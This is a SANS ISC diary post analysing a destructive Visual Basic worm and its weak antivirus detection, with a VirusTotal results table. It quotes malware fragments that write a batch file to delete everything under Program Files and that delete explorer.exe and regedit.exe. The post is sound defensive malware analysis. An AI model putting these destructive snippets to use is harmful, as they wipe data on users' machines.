Threat Level: green Handler on Duty: Guy Bruneau

SANS ISC: VB detection: is it so difficult? - Internet Security | DShield SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
VB detection: is it so difficult?

One of our readers submitted a malware sample his machine got infected with recently. The sample was a worm written in Visual Basic, so it was an easy analysis.

The worm offered nothing new really – the only thing that surprised me was how destructive it is (today we normally see only sneaky malware that tries to stay on your system as long as possible). Except setting dozens of registry keys to disable certain executables from being run (such as Anti Virus programs, but simple programs as Notepad as well), it did something really nasty:

set yeah=fso.CreateTextFile("C:\Northstar.bat")
yeah.WriteLine "@echo off"
yeah.WriteLine "cls"
yeah.WriteLine "deltree C:\Program Files\*.*"

yeah.Close

In other words, it tries to delete all the files under the Program Files directory. Besides this, it tries to delete two other files:

Set k = fso.GetFile("c:\windows\explorer.exe")
k.Delete
Set k = fso.GetFile("c:\windows\regedit.exe")

k.Delete

Due to Windows File Protection, this will fail, but we can see that the malware author decided to be very destructive (the worm replicates itself to all available shares and disks before this).

After playing with it I decided to see what's the AV coverage of this (simple) piece of malware … and the result was shocking. On VirusTotal, only 11 out of 32 AV detected it:

AntiVir      7.6.0.80      2008.04.03          VBS/Zapchast
AVG          7.5.0.516     2008.04.02          VBS/Small
BitDefender  7.2           2008.04.03          Win32.Ariss.A@mm
DrWeb        4.44.0.09170  2008.04.03          modification of VBS.Generic.458
eSafe        7.0.15.0      2008.04.01          VBS.Crystal
F-Secure     6.70.13260.0  2008.04.03          Type_Script
Kaspersky    7.0.0.125     2008.04.03          Type_Script
NOD32v2      2998          2008.04.03          VBS/SysLock.A
Panda        9.0.0.4       2008.04.02          Suspicious file
Rising       20.38.22.00   2008.04.02          Worm.Larisa.a

Webwasher-Gateway  6.6.2   2008.04.03          Script.Soad.2

As you can see, most major anti-virus programs missed this (very simple) piece of malware. We've sent the sample to them so hopefully they will start detecting it soon, but this is another example of why we must not ignore old(er) technologies that the bad guys still rely on.

--

Bojan

I will be teaching next: Web App Penetration Testing and Ethical Hacking - SANS Munich July 2019

Bojan

376 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!